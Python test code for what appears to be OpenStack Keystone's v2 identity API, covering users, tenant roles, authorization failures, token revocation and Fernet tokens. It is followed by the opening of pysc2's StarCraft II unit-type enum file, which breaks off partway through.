        path='/v2.0/users',
        body={
            'user': {
                'name': 'test_invalid_tenant',
                'password': uuid.uuid4().hex,
                'enabled': True,
            },
        },
        token=token,
        expected_status=200)
    user_id = self._get_user_id(r.result)

    # Update user with an invalid tenant
    r = self.admin_request(
        method='PUT',
        path='/v2.0/users/%(user_id)s' % {
            'user_id': user_id,
        },
        body={
            'user': {
                'tenantId': 'abcde12345heha',
            },
        },
        token=token,
        expected_status=http_client.NOT_FOUND)
def test_update_user_with_old_tenant(self):
    """Re-submitting the current tenantId keeps the member role intact."""
    token = self.get_scoped_token()

    # Create a new user
    r = self.admin_request(
        method='POST',
        path='/v2.0/users',
        body={
            'user': {
                'name': uuid.uuid4().hex,
                'password': uuid.uuid4().hex,
                'tenantId': self.tenant_bar['id'],
                'enabled': True,
            },
        },
        token=token,
        expected_status=200)

    user_id = self._get_user_id(r.result)

    # Check if member_role is in tenant_bar
    r = self.admin_request(
        path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
            'project_id': self.tenant_bar['id'],
            'user_id': user_id
        },
        token=token,
        expected_status=200)
    self.assertEqual(CONF.member_role_name, self._get_role_name(r.result))

    # Update user's tenant with old tenant id
    r = self.admin_request(
        method='PUT',
        path='/v2.0/users/%(user_id)s' % {
            'user_id': user_id,
        },
        body={
            'user': {
                'tenantId': self.tenant_bar['id'],
            },
        },
        token=token,
        expected_status=200)

    # 'member_role' should still be in tenant_bar
    r = self.admin_request(
        path='/v2.0/tenants/%(project_id)s/users/%(user_id)s/roles' % {
            'project_id': self.tenant_bar['id'],
            'user_id': user_id
        },
        token=token,
        expected_status=200)
    self.assertEqual('_member_', self._get_role_name(r.result))
def test_authenticating_a_user_with_no_password(self):
    """A user created without a password must fail password auth."""
    token = self.get_scoped_token()
    username = uuid.uuid4().hex

    # Create the user with no password attribute at all.
    create_body = {
        'user': {
            'name': username,
            'enabled': True,
        },
    }
    self.admin_request(method='POST',
                       path='/v2.0/users',
                       body=create_body,
                       token=token)

    # Any password guess must be rejected as unauthorized.
    auth_body = {
        'auth': {
            'passwordCredentials': {
                'username': username,
                'password': 'password',
            },
        },
    }
    resp = self.public_request(method='POST',
                               path='/v2.0/tokens',
                               body=auth_body,
                               expected_status=http_client.UNAUTHORIZED)
    self.assertValidErrorResponse(resp)
def test_www_authenticate_header(self):
    """401 responses carry the default WWW-Authenticate challenge."""
    resp = self.public_request(
        path='/v2.0/tenants',
        expected_status=http_client.UNAUTHORIZED)
    challenge = resp.headers.get('WWW-Authenticate')
    self.assertEqual('Keystone uri="http://localhost"', challenge)
def test_www_authenticate_header_host(self):
    """The WWW-Authenticate challenge URI tracks the configured public endpoint."""
    test_url = 'http://%s:4187' % uuid.uuid4().hex
    self.config_fixture.config(public_endpoint=test_url)

    resp = self.public_request(
        path='/v2.0/tenants',
        expected_status=http_client.UNAUTHORIZED)
    challenge = resp.headers.get('WWW-Authenticate')
    self.assertEqual('Keystone uri="%s"' % test_url, challenge)
class LegacyV2UsernameTests(object):
    """Tests to show the broken username behavior in V2.

    The V2 API is documented to use `username` instead of `name`. The
    API forced used to use name and left the username to fall into the
    `extra` field.

    These tests ensure this behavior works so fixes to `username`/`name`
    will be backward compatible.
    """

    def create_user(self, **user_attrs):
        """Create a user and return the response object.

        :param user_attrs: attributes added to the request body (optional)
        """
        token = self.get_scoped_token()
        body = {
            'user': {
                'name': uuid.uuid4().hex,
                'enabled': True,
            },
        }
        body['user'].update(user_attrs)

        return self.admin_request(
            method='POST',
            path='/v2.0/users',
            token=token,
            body=body,
            expected_status=200)

    def test_create_with_extra_username(self):
        """The response for creating a user will contain the extra fields."""
        fake_username = uuid.uuid4().hex
        r = self.create_user(username=fake_username)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(fake_username, user.get('username'))

    def test_get_returns_username_from_extra(self):
        """The response for getting a user will contain the extra fields."""
        token = self.get_scoped_token()

        fake_username = uuid.uuid4().hex
        r = self.create_user(username=fake_username)

        id_ = self.get_user_attribute_from_response(r, 'id')
        r = self.admin_request(path='/v2.0/users/%s' % id_, token=token)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(fake_username, user.get('username'))

    def test_update_returns_new_username_when_adding_username(self):
        """The response for updating a user will contain the extra fields.

        This is specifically testing for updating a username when a value
        was not previously set.
        """
        token = self.get_scoped_token()

        r = self.create_user()
        id_ = self.get_user_attribute_from_response(r, 'id')
        name = self.get_user_attribute_from_response(r, 'name')
        enabled = self.get_user_attribute_from_response(r, 'enabled')
        r = self.admin_request(
            method='PUT',
            path='/v2.0/users/%s' % id_,
            token=token,
            body={
                'user': {
                    'name': name,
                    'username': 'new_username',
                    'enabled': enabled,
                },
            },
            expected_status=200)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual('new_username', user.get('username'))

    def test_update_returns_new_username_when_updating_username(self):
        """The response for updating a user will contain the extra fields.

        This tests updating a username that was previously set.
        """
        token = self.get_scoped_token()

        r = self.create_user(username='original_username')
        id_ = self.get_user_attribute_from_response(r, 'id')
        name = self.get_user_attribute_from_response(r, 'name')
        enabled = self.get_user_attribute_from_response(r, 'enabled')
        r = self.admin_request(
            method='PUT',
            path='/v2.0/users/%s' % id_,
            token=token,
            body={
                'user': {
                    'name': name,
                    'username': 'new_username',
                    'enabled': enabled,
                },
            },
            expected_status=200)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual('new_username', user.get('username'))

    def test_username_is_always_returned_create(self):
        """Username is set as the value of name if no username is provided.

        This matches the v2.0 spec where we really should be using username
        and not name.
        """
        r = self.create_user()

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(user.get('name'), user.get('username'))

    def test_username_is_always_returned_get(self):
        """Username is set as the value of name if no username is provided.

        This matches the v2.0 spec where we really should be using username
        and not name.
        """
        token = self.get_scoped_token()

        r = self.create_user()

        id_ = self.get_user_attribute_from_response(r, 'id')
        r = self.admin_request(path='/v2.0/users/%s' % id_, token=token)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(user.get('name'), user.get('username'))

    def test_username_is_always_returned_get_by_name(self):
        """Username is set as the value of name if no username is provided.

        This matches the v2.0 spec where we really should be using username
        and not name.
        """
        token = self.get_scoped_token()

        r = self.create_user()

        name = self.get_user_attribute_from_response(r, 'name')
        r = self.admin_request(path='/v2.0/users?name=%s' % name, token=token)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(user.get('name'), user.get('username'))

    def test_username_is_always_returned_update_no_username_provided(self):
        """Username is set as the value of name if no username is provided.

        This matches the v2.0 spec where we really should be using username
        and not name.
        """
        token = self.get_scoped_token()

        r = self.create_user()
        id_ = self.get_user_attribute_from_response(r, 'id')
        name = self.get_user_attribute_from_response(r, 'name')
        enabled = self.get_user_attribute_from_response(r, 'enabled')
        r = self.admin_request(
            method='PUT',
            path='/v2.0/users/%s' % id_,
            token=token,
            body={
                'user': {
                    'name': name,
                    'enabled': enabled,
                },
            },
            expected_status=200)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(user.get('name'), user.get('username'))

    def test_updated_username_is_returned(self):
        """Username is set as the value of name if no username is provided.

        This matches the v2.0 spec where we really should be using username
        and not name.
        """
        token = self.get_scoped_token()

        r = self.create_user()
        id_ = self.get_user_attribute_from_response(r, 'id')
        name = self.get_user_attribute_from_response(r, 'name')
        enabled = self.get_user_attribute_from_response(r, 'enabled')
        r = self.admin_request(
            method='PUT',
            path='/v2.0/users/%s' % id_,
            token=token,
            body={
                'user': {
                    'name': name,
                    'enabled': enabled,
                },
            },
            expected_status=200)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(user.get('name'), user.get('username'))

    def test_username_can_be_used_instead_of_name_create(self):
        # 'username' alone in the create body is mirrored into 'name'.
        token = self.get_scoped_token()

        r = self.admin_request(
            method='POST',
            path='/v2.0/users',
            token=token,
            body={
                'user': {
                    'username': uuid.uuid4().hex,
                    'enabled': True,
                },
            },
            expected_status=200)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(user.get('name'), user.get('username'))

    def test_username_can_be_used_instead_of_name_update(self):
        # 'username' alone in the update body is mirrored into 'name'.
        token = self.get_scoped_token()

        r = self.create_user()
        id_ = self.get_user_attribute_from_response(r, 'id')
        new_username = uuid.uuid4().hex
        enabled = self.get_user_attribute_from_response(r, 'enabled')
        r = self.admin_request(
            method='PUT',
            path='/v2.0/users/%s' % id_,
            token=token,
            body={
                'user': {
                    'username': new_username,
                    'enabled': enabled,
                },
            },
            expected_status=200)

        self.assertValidUserResponse(r)

        user = self.get_user_from_response(r)
        self.assertEqual(new_username, user.get('name'))
        self.assertEqual(user.get('name'), user.get('username'))
class RestfulTestCase(rest.RestfulTestCase):
    """REST base class that grants the admin role to the fixture user."""

    def setUp(self):
        super(RestfulTestCase, self).setUp()

        # TODO(termie): add an admin user to the fixtures and use that user
        # override the fixtures, for now
        self.assignment_api.add_role_to_user_and_project(
            self.user_foo['id'],
            self.tenant_bar['id'],
            self.role_admin['id'])
class V2TestCase(RestfulTestCase, CoreApiTests, LegacyV2UsernameTests):
    """JSON-content-type implementation of the shared v2 API tests."""

    # --- response-parsing hooks required by CoreApiTests -----------------

    def _get_user_id(self, r):
        return r['user']['id']

    def _get_role_name(self, r):
        return r['roles'][0]['name']

    def _get_role_id(self, r):
        return r['roles'][0]['id']

    def _get_project_id(self, r):
        return r['tenant']['id']

    def _get_token_id(self, r):
        return r.result['access']['token']['id']

    def assertNoRoles(self, r):
        self.assertEqual([], r['roles'])

    # --- response validators ---------------------------------------------

    def assertValidErrorResponse(self, r):
        self.assertIsNotNone(r.result.get('error'))
        self.assertValidError(r.result['error'])
        self.assertEqual(r.result['error']['code'], r.status_code)

    def assertValidExtension(self, extension, expected):
        super(V2TestCase, self).assertValidExtension(extension)
        descriptions = [ext['description'] for ext in six.itervalues(expected)]
        description = extension.get('description')
        self.assertIsNotNone(description)
        self.assertIn(description, descriptions)
        self.assertIsNotNone(extension.get('links'))
        self.assertNotEmpty(extension.get('links'))
        for link in extension.get('links'):
            self.assertValidExtensionLink(link)

    def assertValidExtensionListResponse(self, r, expected):
        self.assertIsNotNone(r.result.get('extensions'))
        self.assertIsNotNone(r.result['extensions'].get('values'))
        self.assertNotEmpty(r.result['extensions'].get('values'))
        for extension in r.result['extensions']['values']:
            self.assertValidExtension(extension, expected)

    def assertValidExtensionResponse(self, r, expected):
        self.assertValidExtension(r.result.get('extension'), expected)

    def assertValidUser(self, user):
        super(V2TestCase, self).assertValidUser(user)
        self.assertNotIn('default_project_id', user)
        if 'tenantId' in user:
            # NOTE(morganfainberg): tenantId should never be "None", it gets
            # filtered out of the object if it is there. This is suspenders
            # and a belt check to avoid unintended regressions.
            self.assertIsNotNone(user.get('tenantId'))

    def assertValidAuthenticationResponse(self, r,
                                          require_service_catalog=False):
        self.assertIsNotNone(r.result.get('access'))
        self.assertIsNotNone(r.result['access'].get('token'))
        self.assertIsNotNone(r.result['access'].get('user'))

        # validate token
        self.assertIsNotNone(r.result['access']['token'].get('id'))
        self.assertIsNotNone(r.result['access']['token'].get('expires'))
        tenant = r.result['access']['token'].get('tenant')
        if tenant is not None:
            # validate tenant
            self.assertIsNotNone(tenant.get('id'))
            self.assertIsNotNone(tenant.get('name'))

        # validate user
        self.assertIsNotNone(r.result['access']['user'].get('id'))
        self.assertIsNotNone(r.result['access']['user'].get('name'))

        if require_service_catalog:
            # roles are only provided with a service catalog
            roles = r.result['access']['user'].get('roles')
            self.assertNotEmpty(roles)
            for role in roles:
                self.assertIsNotNone(role.get('name'))

        serviceCatalog = r.result['access'].get('serviceCatalog')
        # validate service catalog
        if require_service_catalog:
            self.assertIsNotNone(serviceCatalog)
        if serviceCatalog is not None:
            self.assertIsInstance(serviceCatalog, list)
            if require_service_catalog:
                self.assertNotEmpty(serviceCatalog)
            for service in r.result['access']['serviceCatalog']:
                # validate service
                self.assertIsNotNone(service.get('name'))
                self.assertIsNotNone(service.get('type'))

                # services contain at least one endpoint
                self.assertIsNotNone(service.get('endpoints'))
                self.assertNotEmpty(service['endpoints'])
                for endpoint in service['endpoints']:
                    # validate service endpoint
                    self.assertIsNotNone(endpoint.get('publicURL'))

    def assertValidTenantListResponse(self, r):
        self.assertIsNotNone(r.result.get('tenants'))
        self.assertNotEmpty(r.result['tenants'])
        for tenant in r.result['tenants']:
            self.assertValidTenant(tenant)
            self.assertIsNotNone(tenant.get('enabled'))
            self.assertIn(tenant.get('enabled'), [True, False])

    def assertValidUserResponse(self, r):
        self.assertIsNotNone(r.result.get('user'))
        self.assertValidUser(r.result['user'])

    def assertValidTenantResponse(self, r):
        self.assertIsNotNone(r.result.get('tenant'))
        self.assertValidTenant(r.result['tenant'])

    def assertValidRoleListResponse(self, r):
        self.assertIsNotNone(r.result.get('roles'))
        self.assertNotEmpty(r.result['roles'])
        for role in r.result['roles']:
            self.assertValidRole(role)

    def assertValidVersion(self, version):
        super(V2TestCase, self).assertValidVersion(version)

        self.assertIsNotNone(version.get('links'))
        self.assertNotEmpty(version.get('links'))
        for link in version.get('links'):
            self.assertIsNotNone(link.get('rel'))
            self.assertIsNotNone(link.get('href'))

        self.assertIsNotNone(version.get('media-types'))
        self.assertNotEmpty(version.get('media-types'))
        for media in version.get('media-types'):
            self.assertIsNotNone(media.get('base'))
            self.assertIsNotNone(media.get('type'))

    def assertValidMultipleChoiceResponse(self, r):
        self.assertIsNotNone(r.result.get('versions'))
        self.assertIsNotNone(r.result['versions'].get('values'))
        self.assertNotEmpty(r.result['versions']['values'])
        for version in r.result['versions']['values']:
            self.assertValidVersion(version)

    def assertValidVersionResponse(self, r):
        self.assertValidVersion(r.result.get('version'))

    def assertValidEndpointListResponse(self, r):
        self.assertIsNotNone(r.result.get('endpoints'))
        self.assertNotEmpty(r.result['endpoints'])
        for endpoint in r.result['endpoints']:
            self.assertIsNotNone(endpoint.get('id'))
            self.assertIsNotNone(endpoint.get('name'))
            self.assertIsNotNone(endpoint.get('type'))
            self.assertIsNotNone(endpoint.get('publicURL'))
            self.assertIsNotNone(endpoint.get('internalURL'))
            self.assertIsNotNone(endpoint.get('adminURL'))

    def get_user_from_response(self, r):
        return r.result.get('user')

    def get_user_attribute_from_response(self, r, attribute_name):
        return r.result['user'][attribute_name]

    # --- tests -------------------------------------------------------------

    def test_service_crud_requires_auth(self):
        """Service CRUD should return unauthorized without an X-Auth-Token."""
        # values here don't matter because it will be unauthorized before
        # they're checked (bug 1006822).
        service_path = '/v2.0/OS-KSADM/services/%s' % uuid.uuid4().hex
        service_body = {
            'OS-KSADM:service': {
                'name': uuid.uuid4().hex,
                'type': uuid.uuid4().hex,
            },
        }

        r = self.admin_request(method='GET',
                               path='/v2.0/OS-KSADM/services',
                               expected_status=http_client.UNAUTHORIZED)
        self.assertValidErrorResponse(r)

        r = self.admin_request(method='POST',
                               path='/v2.0/OS-KSADM/services',
                               body=service_body,
                               expected_status=http_client.UNAUTHORIZED)
        self.assertValidErrorResponse(r)

        r = self.admin_request(method='GET',
                               path=service_path,
                               expected_status=http_client.UNAUTHORIZED)
        self.assertValidErrorResponse(r)

        r = self.admin_request(method='DELETE',
                               path=service_path,
                               expected_status=http_client.UNAUTHORIZED)
        self.assertValidErrorResponse(r)

    def test_user_role_list_requires_auth(self):
        """User role list return unauthorized without an X-Auth-Token."""
        # values here don't matter because it will be unauthorized before
        # they're checked (bug 1006815).
        path = '/v2.0/tenants/%(tenant_id)s/users/%(user_id)s/roles' % {
            'tenant_id': uuid.uuid4().hex,
            'user_id': uuid.uuid4().hex,
        }

        r = self.admin_request(path=path,
                               expected_status=http_client.UNAUTHORIZED)
        self.assertValidErrorResponse(r)

    def test_fetch_revocation_list_nonadmin_fails(self):
        self.admin_request(
            method='GET',
            path='/v2.0/tokens/revoked',
            expected_status=http_client.UNAUTHORIZED)

    def test_fetch_revocation_list_admin_200(self):
        token = self.get_scoped_token()
        r = self.admin_request(
            method='GET',
            path='/v2.0/tokens/revoked',
            token=token,
            expected_status=200)
        self.assertValidRevocationListResponse(r)

    def assertValidRevocationListResponse(self, response):
        self.assertIsNotNone(response.result['signed'])

    def _fetch_parse_revocation_list(self):
        """Revoke a token, then fetch and CMS-verify the revocation list.

        Returns a (parsed-list, revoked-token) tuple.
        """
        token1 = self.get_scoped_token()

        # TODO(morganfainberg): Because this is making a restful call to the
        # app a change to UTCNOW via mock.patch will not affect the returned
        # token. The only surefire way to ensure there is not a transient bug
        # based upon when the second token is issued is with a sleep. This
        # issue all stems from the limited resolution (no microseconds) on the
        # expiry time of tokens and the way revocation events utilizes token
        # expiry to revoke individual tokens. This is a stop-gap until all
        # associated issues with resolution on expiration and revocation events
        # are resolved.
        time.sleep(1)

        token2 = self.get_scoped_token()

        self.admin_request(method='DELETE',
                           path='/v2.0/tokens/%s' % token2,
                           token=token1)

        r = self.admin_request(
            method='GET',
            path='/v2.0/tokens/revoked',
            token=token1,
            expected_status=200)
        signed_text = r.result['signed']

        data_json = cms.cms_verify(signed_text, CONF.signing.certfile,
                                   CONF.signing.ca_certs)

        data = json.loads(data_json)

        return (data, token2)

    def test_fetch_revocation_list_md5(self):
        """If the server is configured for md5, then the revocation list has
        tokens hashed with MD5.
        """
        # The default hash algorithm is md5.
        hash_algorithm = 'md5'

        (data, token) = self._fetch_parse_revocation_list()
        token_hash = cms.cms_hash_token(token, mode=hash_algorithm)
        self.assertThat(token_hash, matchers.Equals(data['revoked'][0]['id']))

    def test_fetch_revocation_list_sha256(self):
        """If the server is configured for sha256, then the revocation list has
        tokens hashed with SHA256
        """
        hash_algorithm = 'sha256'
        self.config_fixture.config(group='token',
                                   hash_algorithm=hash_algorithm)

        (data, token) = self._fetch_parse_revocation_list()
        token_hash = cms.cms_hash_token(token, mode=hash_algorithm)
        self.assertThat(token_hash, matchers.Equals(data['revoked'][0]['id']))

    def test_create_update_user_invalid_enabled_type(self):
        # Enforce usage of boolean for 'enabled' field
        token = self.get_scoped_token()

        # Test CREATE request
        r = self.admin_request(
            method='POST',
            path='/v2.0/users',
            body={
                'user': {
                    'name': uuid.uuid4().hex,
                    'password': uuid.uuid4().hex,
                    # In JSON, "true|false" are not boolean
                    'enabled': "true",
                },
            },
            token=token,
            expected_status=http_client.BAD_REQUEST)
        self.assertValidErrorResponse(r)

        # Test UPDATE request
        r = self.admin_request(
            method='PUT',
            path='/v2.0/users/%(user_id)s' % {
                'user_id': self.user_foo['id'],
            },
            body={
                'user': {
                    # In JSON, "true|false" are not boolean
                    'enabled': "true",
                },
            },
            token=token,
            expected_status=http_client.BAD_REQUEST)
        self.assertValidErrorResponse(r)

    def test_authenticating_a_user_with_an_OSKSADM_password(self):
        token = self.get_scoped_token()

        username = uuid.uuid4().hex
        password = uuid.uuid4().hex

        # create the user
        r = self.admin_request(
            method='POST',
            path='/v2.0/users',
            body={
                'user': {
                    'name': username,
                    'OS-KSADM:password': password,
                    'enabled': True,
                },
            },
            token=token)

        # successfully authenticate
        self.public_request(
            method='POST',
            path='/v2.0/tokens',
            body={
                'auth': {
                    'passwordCredentials': {
                        'username': username,
                        'password': password,
                    },
                },
            },
            expected_status=200)

        # ensure password doesn't leak
        user_id = r.result['user']['id']
        r = self.admin_request(
            method='GET',
            path='/v2.0/users/%s' % user_id,
            token=token,
            expected_status=200)
        self.assertNotIn('OS-KSADM:password', r.result['user'])

    def test_updating_a_user_with_an_OSKSADM_password(self):
        token = self.get_scoped_token()

        user_id = self.user_foo['id']
        password = uuid.uuid4().hex

        # update the user
        self.admin_request(
            method='PUT',
            path='/v2.0/users/%s/OS-KSADM/password' % user_id,
            body={
                'user': {
                    'password': password,
                },
            },
            token=token,
            expected_status=200)

        # successfully authenticate
        self.public_request(
            method='POST',
            path='/v2.0/tokens',
            body={
                'auth': {
                    'passwordCredentials': {
                        'username': self.user_foo['name'],
                        'password': password,
                    },
                },
            },
            expected_status=200)
class RevokeApiTestCase(V2TestCase):
    """Re-run the V2 tests with the revocation-events backend enabled.

    With revoke_by_id disabled, the classic signed revocation list is not
    maintained, so the revocation-list tests are skipped.
    """

    def config_overrides(self):
        super(RevokeApiTestCase, self).config_overrides()
        self.config_fixture.config(group='revoke', driver='kvs')
        self.config_fixture.config(
            group='token',
            provider='pki',
            revoke_by_id=False)

    def test_fetch_revocation_list_admin_200(self):
        self.skipTest('Revoke API disables revocation_list.')

    def test_fetch_revocation_list_md5(self):
        self.skipTest('Revoke API disables revocation_list.')

    def test_fetch_revocation_list_sha256(self):
        self.skipTest('Revoke API disables revocation_list.')
class TestFernetTokenProviderV2(RestfulTestCase):
    """V2 API tests run against the Fernet token provider."""

    def setUp(self):
        super(TestFernetTokenProviderV2, self).setUp()
        # Fernet tokens require a key repository on disk.
        self.useFixture(ksfixtures.KeyRepository(self.config_fixture))

    # Used by RestfulTestCase
    def _get_token_id(self, r):
        return r.result['access']['token']['id']

    def new_project_ref(self):
        """Return a fresh project reference dict in the default domain."""
        return {'id': uuid.uuid4().hex,
                'name': uuid.uuid4().hex,
                'description': uuid.uuid4().hex,
                'domain_id': 'default',
                'enabled': True}

    def config_overrides(self):
        super(TestFernetTokenProviderV2, self).config_overrides()
        self.config_fixture.config(group='token', provider='fernet')

    def test_authenticate_unscoped_token(self):
        unscoped_token = self.get_unscoped_token()
        # Fernet token must be of length 255 per usability requirements
        self.assertLess(len(unscoped_token), 255)

    def test_validate_unscoped_token(self):
        # Grab an admin token to validate with
        project_ref = self.new_project_ref()
        self.resource_api.create_project(project_ref['id'], project_ref)
        self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
                                                         project_ref['id'],
                                                         self.role_admin['id'])
        admin_token = self.get_scoped_token(tenant_id=project_ref['id'])
        unscoped_token = self.get_unscoped_token()
        path = ('/v2.0/tokens/%s' % unscoped_token)
        self.admin_request(
            method='GET',
            path=path,
            token=admin_token,
            expected_status=200)

    def test_authenticate_scoped_token(self):
        project_ref = self.new_project_ref()
        self.resource_api.create_project(project_ref['id'], project_ref)
        self.assignment_api.add_role_to_user_and_project(
            self.user_foo['id'], project_ref['id'], self.role_service['id'])
        token = self.get_scoped_token(tenant_id=project_ref['id'])
        # Fernet token must be of length 255 per usability requirements
        self.assertLess(len(token), 255)

    def test_validate_scoped_token(self):
        project_ref = self.new_project_ref()
        self.resource_api.create_project(project_ref['id'], project_ref)
        self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
                                                         project_ref['id'],
                                                         self.role_admin['id'])
        project2_ref = self.new_project_ref()
        self.resource_api.create_project(project2_ref['id'], project2_ref)
        self.assignment_api.add_role_to_user_and_project(
            self.user_foo['id'], project2_ref['id'], self.role_member['id'])
        admin_token = self.get_scoped_token(tenant_id=project_ref['id'])
        member_token = self.get_scoped_token(tenant_id=project2_ref['id'])
        path = ('/v2.0/tokens/%s?belongsTo=%s' % (member_token,
                                                  project2_ref['id']))
        # Validate token belongs to project
        self.admin_request(
            method='GET',
            path=path,
            token=admin_token,
            expected_status=200)

    def test_token_authentication_and_validation(self):
        """Test token authentication for Fernet token provider.

        Verify that token authentication returns validate response code and
        valid token belongs to project.
        """
        project_ref = self.new_project_ref()
        self.resource_api.create_project(project_ref['id'], project_ref)
        unscoped_token = self.get_unscoped_token()
        self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
                                                         project_ref['id'],
                                                         self.role_admin['id'])
        r = self.public_request(
            method='POST',
            path='/v2.0/tokens',
            body={
                'auth': {
                    'tenantName': project_ref['name'],
                    'token': {
                        'id': unscoped_token.encode('ascii')
                    }
                }
            },
            expected_status=200)
        token_id = self._get_token_id(r)
        path = ('/v2.0/tokens/%s?belongsTo=%s' % (token_id, project_ref['id']))
        # Validate token belongs to project
        self.admin_request(
            method='GET',
            path=path,
            token=CONF.admin_token,
            expected_status=200)

    def test_rescoped_tokens_maintain_original_expiration(self):
        project_ref = self.new_project_ref()
        self.resource_api.create_project(project_ref['id'], project_ref)
        self.assignment_api.add_role_to_user_and_project(self.user_foo['id'],
                                                         project_ref['id'],
                                                         self.role_admin['id'])
        resp = self.public_request(
            method='POST',
            path='/v2.0/tokens',
            body={
                'auth': {
                    'tenantName': project_ref['name'],
                    'passwordCredentials': {
                        'username': self.user_foo['name'],
                        'password': self.user_foo['password']
                    }
                }
            },
            # NOTE(lbragstad): This test may need to be refactored if Keystone
            # decides to disallow rescoping using a scoped token.
            expected_status=200)
        original_token = resp.result['access']['token']['id']
        original_expiration = resp.result['access']['token']['expires']

        resp = self.public_request(
            method='POST',
            path='/v2.0/tokens',
            body={
                'auth': {
                    'tenantName': project_ref['name'],
                    'token': {
                        'id': original_token,
                    }
                }
            },
            expected_status=200)
        rescoped_token = resp.result['access']['token']['id']
        rescoped_expiration = resp.result['access']['token']['expires']
        self.assertNotEqual(original_token, rescoped_token)
        self.assertEqual(original_expiration, rescoped_expiration)
| 35.320388 | 79 | 0.562269 |
acdfca7f426e551b8337e5133afe735efa6822e9 | 9,621 | py | Python | pysc2/lib/units.py | LukeBolly/dreamerv2 | 7bd59d39d0df7a573859487e698b9bce6417e5c6 | [
"MIT"
] | null | null | null | pysc2/lib/units.py | LukeBolly/dreamerv2 | 7bd59d39d0df7a573859487e698b9bce6417e5c6 | [
"MIT"
] | null | null | null | pysc2/lib/units.py | LukeBolly/dreamerv2 | 7bd59d39d0df7a573859487e698b9bce6417e5c6 | [
"MIT"
] | null | null | null | # Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Define the static list of units for SC2. Generated by bin/gen_data.py."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
class Neutral(enum.IntEnum):
    """Neutral units.

    Auto-generated mapping of SC2 neutral unit names to their numeric
    unit-type IDs (see the module docstring: generated by bin/gen_data.py).
    Do not edit values by hand.
    """
    AccelerationZoneLarge = 1987
    AccelerationZoneSmall = 1985
    BattleStationMineralField = 886
    BattleStationMineralField750 = 887
    BlimpMengskACGluescreenDummy = 1957
    CarrionBird = 322
    CleaningBot = 612
    CollapsibleRockTower = 609
    CollapsibleRockTowerDebris = 490
    CollapsibleRockTowerDebrisRampLeft = 518
    CollapsibleRockTowerDebrisRampRight = 517
    CollapsibleRockTowerDiagonal = 588
    CollapsibleRockTowerPushUnit = 561
    CollapsibleRockTowerPushUnitRampLeft = 564
    CollapsibleRockTowerPushUnitRampRight = 563
    CollapsibleRockTowerRampLeft = 664
    CollapsibleRockTowerRampRight = 663
    CollapsibleTerranTower = 610
    CollapsibleTerranTowerDebris = 485
    CollapsibleTerranTowerDiagonal = 589
    CollapsibleTerranTowerPushUnit = 562
    CollapsibleTerranTowerPushUnitRampLeft = 559
    CollapsibleTerranTowerPushUnitRampRight = 560
    CollapsibleTerranTowerRampLeft = 590
    CollapsibleTerranTowerRampRight = 591
    Crabeetle = 662
    Debris2x2NonConjoined = 475
    DebrisRampLeft = 486
    DebrisRampRight = 487
    DestructibleBillboardTall = 350
    DestructibleCityDebris4x4 = 628
    DestructibleCityDebris6x6 = 629
    DestructibleCityDebrisHugeDiagonalBLUR = 630
    DestructibleDebris4x4 = 364
    DestructibleDebris6x6 = 365
    DestructibleDebrisRampDiagonalHugeBLUR = 377
    DestructibleDebrisRampDiagonalHugeULBR = 376
    DestructibleIce4x4 = 648
    DestructibleIce6x6 = 649
    DestructibleIceDiagonalHugeBLUR = 651
    DestructibleRampDiagonalHugeBLUR = 373
    DestructibleRampDiagonalHugeULBR = 372
    DestructibleRock6x6 = 371
    DestructibleRockEx14x4 = 638
    DestructibleRockEx16x6 = 639
    DestructibleRockEx1DiagonalHugeBLUR = 641
    DestructibleRockEx1DiagonalHugeULBR = 640
    DestructibleRockEx1HorizontalHuge = 643
    DestructibleRockEx1VerticalHuge = 642
    Dog = 336
    KarakFemale = 324
    LabBot = 661
    LabMineralField = 665
    LabMineralField750 = 666
    Lyote = 321
    MarauderMengskACGluescreenDummy = 1958
    MedivacMengskACGluescreenDummy = 1956
    MineralField = 341
    MineralField750 = 483
    ProtossVespeneGeyser = 608
    PurifierMineralField = 884
    PurifierMineralField750 = 885
    PurifierRichMineralField = 796
    PurifierRichMineralField750 = 797
    PurifierVespeneGeyser = 880
    ReptileCrate = 877
    RichMineralField = 146
    RichMineralField750 = 147
    RichVespeneGeyser = 344
    Scantipede = 335
    ShakurasVespeneGeyser = 881
    SiegeTankMengskACGluescreenDummy = 1960
    SpacePlatformGeyser = 343
    ThorMengskACGluescreenDummy = 1961
    TrooperMengskACGluescreenDummy = 1955
    UnbuildableBricksDestructible = 473
    UnbuildablePlatesDestructible = 474
    UnbuildableRocksDestructible = 472
    UtilityBot = 330
    VespeneGeyser = 342
    XelNagaDestructibleBlocker8NE = 1904
    XelNagaDestructibleBlocker8SW = 1908
    XelNagaTower = 149
    # NOTE(review): out of alphabetical order in the generated source;
    # kept as-is to match the generator's output.
    MineralPickup = 1680
class Protoss(enum.IntEnum):
    """Protoss unit and structure type IDs.

    Member values are the raw integer unit-type identifiers reported by the
    game observation (see get_unit_type below).  Definition order matters:
    get_unit_embed_lookup assigns dense embedding indices by iterating the
    enum in this order, so do not reorder or remove members.
    """
    Adept = 311
    AdeptPhaseShift = 801
    Archon = 141
    Assimilator = 61
    AssimilatorRich = 1994
